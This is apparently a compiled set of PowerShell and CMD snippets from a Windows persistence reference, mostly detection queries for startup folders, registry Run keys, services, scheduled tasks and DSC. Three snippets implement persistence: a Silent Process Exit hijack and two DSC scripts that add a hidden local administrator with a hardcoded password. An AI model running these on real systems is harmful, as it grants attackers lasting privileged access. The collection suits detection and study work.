### List User Startup Folders - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Lists files and their properties within the current user's startup folder. It uses the .NET Environment class to get the startup path and then Get-ChildItem to list the contents. ```powershell $startupPath = [Environment]::GetFolderPath('Startup') Get-ChildItem -Path $startupPath -Force | Select-Object Name, FullName, CreationTime, LastWriteTime ``` -------------------------------- ### Detect Windows Services Binary Paths (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects potentially malicious Windows services by listing all services configured to start automatically and filtering for those with unusual binary paths. This helps identify services that might be used for persistence. ```powershell # Detection: Enumerate services and their configurations # Location: HKLM\SYSTEM\CurrentControlSet\Services # PowerShell - List all services with their binary paths Get-WmiObject Win32_Service | Select-Object Name, DisplayName, PathName, StartMode, State | Where-Object { $_.StartMode -eq "Auto" } | Format-Table -AutoSize # PowerShell - Find services with unusual binary paths Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\*" | Where-Object { $_.ImagePath -and $_.ImagePath -notlike "*system32*" -and $_.ImagePath -notlike "*SysWOW64*" } | Select-Object PSChildName, ImagePath, Start, Type ``` -------------------------------- ### List User Startup Folder - Command Prompt Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Lists files in the current user's startup folder using the Command Prompt. It utilizes the %appdata% environment variable. ```cmd dir "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" ``` -------------------------------- ### List All Users' Startup Folders - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Lists files and their properties in the startup folders for all users. This command requires administrative privileges and iterates through the standard user startup path pattern. ```powershell Get-ChildItem "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Force | Select-Object FullName, CreationTime, LastWriteTime ``` -------------------------------- ### Check Environment Variables for Persistence (Command Prompt) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks for the DOTNET_STARTUP_HOOKS environment variable using Command Prompt commands. It queries the registry directly for the variable. ```cmd echo %DOTNET_STARTUP_HOOKS% reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v DOTNET_STARTUP_HOOKS ``` -------------------------------- ### List Common Startup Folder (All Users) - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Lists files in the common startup folder accessible to all users. This command requires administrative privileges. ```powershell Get-ChildItem "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" -Force ``` -------------------------------- ### Detect Windows Services Configuration (Command Prompt) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Queries the configuration and status of a specific Windows service using the command prompt. This is useful for investigating individual services suspected of being used for persistence. ```cmd # Command Prompt - Query specific service sc qc "ServiceName" sc query "ServiceName" ``` -------------------------------- ### List All Scheduled Tasks - Command Prompt Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Lists all scheduled tasks using the Command Prompt's schtasks utility, providing detailed information in a list format. ```cmd # Command Prompt - List all tasks schtasks /query /fo LIST /v ``` -------------------------------- ### Detect Run and RunOnce Registry Keys (Command Prompt) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects suspicious entries in the Run and RunOnce registry keys using the command prompt. This method queries the specified registry paths for auto-starting programs, providing a command-line alternative to PowerShell. ```cmd # Command Prompt - Query registry reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" ``` -------------------------------- ### Check Environment Variables for Persistence (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Retrieves the DOTNET_STARTUP_HOOKS environment variable from both HKLM and HKCU registry hives to detect potential persistence. Handles cases where the variable might not exist. ```powershell Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" | Select-Object DOTNET_STARTUP_HOOKS Get-ItemProperty "HKCU:\Environment" -ErrorAction SilentlyContinue | Select-Object DOTNET_STARTUP_HOOKS ``` -------------------------------- ### Detect Image File Execution Options (IFEO) Debugger (Command Prompt) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks for Image File Execution Options (IFEO) persistence for a specific executable using the command prompt. This command queries the 'Debugger' registry value for a given executable, helping to identify hijacked process launches. ```cmd # Command Prompt - Check specific executable reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger ``` -------------------------------- ### Enumerate Startup Folder Contents (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects user-level persistence by enumerating files within the Startup folder. Files placed in this folder execute automatically at user logon via explorer.exe. ```powershell # Detection: Enumerate startup folder contents # Location: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup # PowerShell - List startup folder items Get-ChildItem -Path "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" ``` -------------------------------- ### Check DOTNET_STARTUP_HOOKS Environment Variable - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks for the presence and value of the DOTNET_STARTUP_HOOKS environment variable at the Machine, User, and Process levels. This variable is used for .NET startup hooks. ```powershell # PowerShell - Check environment variables [Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "Machine") [Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "User") [Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "Process") ``` -------------------------------- ### Configure Silent Process Exit Monitoring (PowerShell) Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/silentexitmonitor.md This PowerShell script configures the Windows registry to monitor the 'notepad.exe' process. When Notepad exits silently, it will launch a PowerShell command to execute 'calc.exe'. This involves setting specific values under 'Image File Execution Options' and 'SilentProcessExit' registry keys. ```powershell $monitoredApp = "notepad.exe" $monitor = "powershell -c calc.exe #" New-Item -Force -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$monitoredApp" | Out-Null Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$monitoredApp" -Name GlobalFlag -Value 512 New-Item -Force -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" | Out-Null Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" -Name ReportingMode -Value 1 Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" -Name MonitorProcess -Value $monitor ``` -------------------------------- ### Detect Run and RunOnce Registry Keys (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects suspicious entries in the Run and RunOnce registry keys, which are standard user-level persistence mechanisms that execute programs at user logon. This script queries the specified registry paths for auto-starting programs. ```powershell # Detection: Query Run keys for suspicious entries # Location: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # Location: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce # PowerShell - List all Run key entries for current user Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" -ErrorAction SilentlyContinue ``` -------------------------------- ### Configure DSC Local Configuration Manager for Persistence (PowerShell) Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/desiredstateconfiguration.md This script modifies the DSC Local Configuration Manager (LCM) to ensure configurations are applied and auto-corrected after reboots, setting the frequency for monitoring and changes. It's a prerequisite for establishing DSC-based persistence. ```powershell #Change DSC Local Configuration Manager [DSCLocalConfigurationManager()] Configuration SetDSCLMConfig { node localhost { Settings { ActionAfterReboot = 'ContinueConfiguration' #Might be already set AllowModuleOverWrite = $true ConfigurationMode = 'ApplyAndAutoCorrect' ConfigurationModeFrequencyMins = 15 #Change this } } } SetDSCLMConfig -OutputPath C:\foo\bar | Out-Null #Setting the configuration manager Set-DscLocalConfigurationManager -Path C:\foo\bar -ComputerName localhost ``` -------------------------------- ### Detect Netsh Extension DLLs (PowerShell & CMD) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks for registered netsh helper DLLs by querying the NetSh registry key. It lists the helper name and its associated DLL path. This can reveal malicious DLLs loaded when netsh.exe is executed. ```powershell # Detection: Check registered netsh helper DLLs # Location: HKLM\SOFTWARE\Microsoft\NetSh # PowerShell - Enumerate netsh extensions Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NetSh" | Select-Object -Property * -ExcludeProperty PS* | Get-Member -MemberType NoteProperty | ForEach-Object { $name = $_.Name $value = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NetSh").$name [PSCustomObject]@{ HelperName = $name DLLPath = $value } } ``` ```cmd reg query "HKLM\SOFTWARE\Microsoft\NetSh" ``` -------------------------------- ### Export Specific Scheduled Task - Command Prompt Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Exports a specific scheduled task to an XML file for detailed analysis. Replace 'TaskName' with the actual name of the task. ```cmd # Export specific task for analysis schtasks /query /tn "TaskName" /xml ``` -------------------------------- ### Quick PowerShell Profile Check - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Performs a quick check for the existence of the current user's PowerShell profile and displays its content if found. ```powershell # Quick check for profile existence Test-Path $PROFILE # View current user profile if (Test-Path $PROFILE) { Get-Content $PROFILE } ``` -------------------------------- ### Create Malicious DSC Configuration for Persistence (PowerShell) Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/desiredstateconfiguration.md This PowerShell configuration defines a malicious DSC resource that adds a specified user to the local administrators group and creates a file to log execution. This is used after configuring the DSC LCM for persistence. ```powershell Configuration NotMalicious { Node localhost { Script ScriptExample { SetScript = { $username = "ITadmin" $password = ConvertTo-SecureString "password123!!" -AsPlainText -Force $exist = Get-LocalUser -Name $username -ErrorAction SilentlyContinue if($exist -eq $null) { New-LocalUser -Name $username -Password $password -FullName "Real IT admin" Add-LocalGroupMember -Group "Administrators" -Member $username } Write-Output "$(whoami) just added ITadmin" > C:\foo\bar\dsc.txt } TestScript = { return ($exist -ne $null) } GetScript = { @{ Result = ($exist -ne $null) } } } } NotMalicious -OutputPath C:\foo\bar | Out-Null #Start the configuration Start-DscConfiguration -Path "C:\foo\bar" -ComputerName localhost | Out-Null ``` -------------------------------- ### List All Scheduled Tasks - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Enumerates all scheduled tasks on the system, displaying their name, path, state, actions, and trigger count. This helps in identifying potentially malicious scheduled tasks. ```powershell # PowerShell - List all scheduled tasks Get-ScheduledTask | Select-Object TaskName, TaskPath, State, @{N='Actions';E={$_.Actions.Execute}}, @{N='Triggers';E={$_.Triggers.Count}} | Format-Table -AutoSize ``` -------------------------------- ### Detect Image File Execution Options (IFEO) Debugger (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects Image File Execution Options (IFEO) persistence by enumerating all IFEO entries that have a 'Debugger' value specified. This admin-level persistence technique hijacks executable launches by specifying a debugger that runs instead of the target process. ```powershell # Detection: Check for Debugger values in IFEO subkeys # Location: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options # PowerShell - Enumerate all IFEO entries with Debugger value Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object { $debugger = Get-ItemProperty -Path $_.PSPath -Name "Debugger" -ErrorAction SilentlyContinue if ($debugger) { [PSCustomObject]@{ ImageName = $_.PSChildName Debugger = $debugger.Debugger } } } ``` -------------------------------- ### Detect Screen Saver Configuration (Command Prompt) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects screen saver persistence by querying the screensaver executable name and its active status using the command prompt. This checks the user's control panel desktop registry settings. ```cmd # Command Prompt reg query "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE reg query "HKCU\Control Panel\Desktop" /v ScreenSaveActive ``` -------------------------------- ### Detect Print Monitor DLLs (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Enumerates registered print monitors and their associated DLLs by querying the Print Monitors registry key. It also verifies if the DLLs are signed by Microsoft. This helps identify malicious DLLs loaded by the print spooler service. ```powershell # Detection: Enumerate registered print monitors # Location: HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors # PowerShell - List all print monitors and their DLLs Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | ForEach-Object { $driver = Get-ItemProperty -Path $_.PSPath -Name "Driver" -ErrorAction SilentlyContinue [PSCustomObject]@{ MonitorName = $_.PSChildName Driver = $driver.Driver } } # Verify DLLs are signed Microsoft binaries Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | ForEach-Object { $driver = (Get-ItemProperty -Path $_.PSPath -Name "Driver" -ErrorAction SilentlyContinue).Driver if ($driver) { $fullPath = "C:\Windows\System32\$driver" $sig = Get-AuthenticodeSignature $fullPath -ErrorAction SilentlyContinue [PSCustomObject]@{ Monitor = $_.PSChildName DLL = $driver SignatureStatus = $sig.Status Signer = $sig.SignerCertificate.Subject } } } ``` -------------------------------- ### Detect File Extension Hijacking (PowerShell & CMD) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects file extension hijacking by checking file type associations in the registry. It queries common file types like .txt, .html, .bat, etc., for their associated open commands. This helps identify malicious code executed when users open common file types. ```powershell # Detection: Check file type associations for common extensions # Location: HKCU\\shell\open\command (e.g., HKCU\txtfile\shell\open\command) # PowerShell - Check text file handler Get-ItemProperty -Path "HKCU:\txtfile\shell\open\command" -ErrorAction SilentlyContinue # Check multiple common file types @('txtfile', 'htmlfile', 'batfile', 'cmdfile', 'jsfile', 'vbsfile') | ForEach-Object { $path = "HKCU:\$_shell\open\command" $handler = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue if ($handler) { [PSCustomObject]@{ FileType = $_ Command = $handler.'(default)' } } } ``` ```cmd # Command Prompt - Check specific association assoc .txt ftype txtfile ``` -------------------------------- ### Detect AMSI Providers (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Enumerates AMSI provider registrations by querying the AMSI Providers and CLSID registry keys. It lists the CLSID and the corresponding DLL path, helping to identify malicious AMSI providers loaded into processes. ```powershell # Detection: Enumerate AMSI provider registrations # Location: HKLM\SOFTWARE\Microsoft\AMSI\Providers # Location: HKLM\SOFTWARE\Classes\CLSID # PowerShell - List AMSI providers Get-ChildItem "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -ErrorAction SilentlyContinue | ForEach-Object { $clsid = $_.PSChildName $clsidPath = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32" $dll = (Get-ItemProperty -Path $clsidPath -ErrorAction SilentlyContinue).'(default)' [PSCustomObject]@{ CLSID = $clsid DLLPath = $dll } } # Expected legitimate output: # CLSID DLLPath # ----- ------- # {2781761E-28E0-4109-99FE-B9D127C57AFE} C:\ProgramData\Microsoft\Windows Defender\... ``` -------------------------------- ### Detect svchost Service DLLs (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Analyzes svchost.exe service configurations by enumerating services and checking their 'ServiceDll' registry values. This helps identify custom DLLs loaded by svchost.exe, which can be a persistence mechanism. ```powershell # PowerShell - Analyze svchost service DLLs Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object { $params = Get-ItemProperty -Path "$($_.PSPath)\Parameters" -ErrorAction SilentlyContinue if ($params.ServiceDll) { [PSCustomObject]@{ ServiceName = $_.PSChildName ServiceDll = $params.ServiceDll } } } ``` -------------------------------- ### Check PowerShell Profile Locations - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks all standard PowerShell profile locations for existence and retrieves their content if they exist. This is useful for detecting persistence via PowerShell profiles. ```powershell # PowerShell - Check all profile paths $profilePaths = @( $PROFILE.AllUsersAllHosts, $PROFILE.AllUsersCurrentHost, $PROFILE.CurrentUserAllHosts, $PROFILE.CurrentUserCurrentHost ) $profilePaths | ForEach-Object { [PSCustomObject]@{ ProfilePath = $_ Exists = Test-Path $_ Content = if (Test-Path $_) { Get-Content $_ -Raw } else { "N/A" } } } ``` -------------------------------- ### Detect Password Filter DLLs (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects registered password filter DLLs by querying the LSA registry key. It lists the DLLs and verifies their existence in the System32 directory. Legitimate outputs include 'scecli' and 'rassfm'. ```powershell # Detection: Check registered password filter DLLs # Location: HKLM\SYSTEM\CurrentControlSet\Control\Lsa # PowerShell - Query Notification Packages (password filters) $lsa = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" $lsa.'Notification Packages' # Expected legitimate output: # scecli # rassfm # Verify each DLL exists in System32 $lsa.'Notification Packages' | ForEach-Object { $dllPath = "C:\Windows\System32\$_.dll" [PSCustomObject]@{ DLLName = $_ Exists = Test-Path $dllPath Path = $dllPath } } ``` ```cmd reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" ``` -------------------------------- ### Monitor Desired State Configuration (DSC) for Persistence (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Monitors Desired State Configuration (DSC) settings to detect persistence mechanisms. Specifically checks if the ConfigurationMode is set to 'ApplyAndAutoCorrect', which enables automatic state restoration. ```powershell # Detection: Check DSC Local Configuration Manager status # Requires: PowerShell 4.0+, WinRM enabled # PowerShell - Get current DSC configuration Get-DscLocalConfigurationManager | Select-Object ConfigurationMode, ConfigurationModeFrequencyMins, RefreshMode, RebootNodeIfNeeded # Check current DSC configuration status Get-DscConfigurationStatus -ErrorAction SilentlyContinue # View applied configuration Get-DscConfiguration -ErrorAction SilentlyContinue # List DSC resources in use Get-DscResource # Check for suspicious ConfigurationMode (ApplyAndAutoCorrect enables persistence) $lcm = Get-DscLocalConfigurationManager if ($lcm.ConfigurationMode -eq "ApplyAndAutoCorrect") { Write-Warning "DSC is set to auto-correct - potential persistence mechanism" $lcm | Format-List * } ``` -------------------------------- ### Detect Screen Saver Configuration (PowerShell) Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Detects screen saver persistence by querying the relevant registry settings in the user's control panel desktop configuration. This checks for the screensaver executable name and its active status. ```powershell # Detection: Check screensaver registry settings # Location: HKCU\Control Panel\Desktop # PowerShell - Query screensaver configuration Get-ItemProperty -Path "HKCU:\Control Panel\Desktop" | Select-Object SCRNSAVE.EXE, ScreenSaveActive, ScreenSaverIsSecure, ScreenSaveTimeOut ``` -------------------------------- ### Enumerate Silent Process Exit Monitors - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Enumerates configured Silent Process Exit monitors by checking the relevant registry key. It displays the process name, reporting mode, and the monitor process. ```powershell # PowerShell - Enumerate Silent Process Exit monitors Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit" -ErrorAction SilentlyContinue | ForEach-Object { $props = Get-ItemProperty -Path $_.PSPath [PSCustomObject]@{ ProcessName = $_.PSChildName ReportingMode = $props.ReportingMode MonitorProcess = $props.MonitorProcess } } ``` -------------------------------- ### Check for GlobalFlag Silent Exit Monitor - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Checks for the presence of the GlobalFlag registry value, specifically looking for the bit that indicates Silent Process Exit monitoring (512). This is done under Image File Execution Options. ```powershell # Check for GlobalFlag (512 = FLG_MONITOR_SILENT_PROCESS_EXIT) Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object { $flag = (Get-ItemProperty -Path $_.PSPath -Name "GlobalFlag" -ErrorAction SilentlyContinue).GlobalFlag if ($flag -band 512) { [PSCustomObject]@{ ProcessName = $_.PSChildName GlobalFlag = $flag SilentExitMonitor = $true } } } ``` -------------------------------- ### Bypass PowerShell Profiles - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Executes a PowerShell command while bypassing any profile scripts. This is useful for testing or running commands without profile interference. ```powershell powershell.exe -NoProfile -Command "Get-Process" ``` -------------------------------- ### Find Suspicious Scheduled Tasks - PowerShell Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt Filters scheduled tasks to find those whose actions do not appear to be related to Microsoft or Windows processes. This can help pinpoint custom or malicious tasks. ```powershell # Find tasks with suspicious characteristics Get-ScheduledTask | ForEach-Object { $task = $_ $info = Get-ScheduledTaskInfo $_ -ErrorAction SilentlyContinue [PSCustomObject]@{ TaskName = $task.TaskName TaskPath = $task.TaskPath State = $task.State LastRunTime = $info.LastRunTime NextRunTime = $info.NextRunTime Actions = ($task.Actions | ForEach-Object { $_.Execute }) -join "; " RunLevel = $task.Principal.RunLevel UserId = $task.Principal.UserId } } | Where-Object { $_.Actions -notlike "*Microsoft*" -and $_.Actions -notlike "*Windows*" } ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.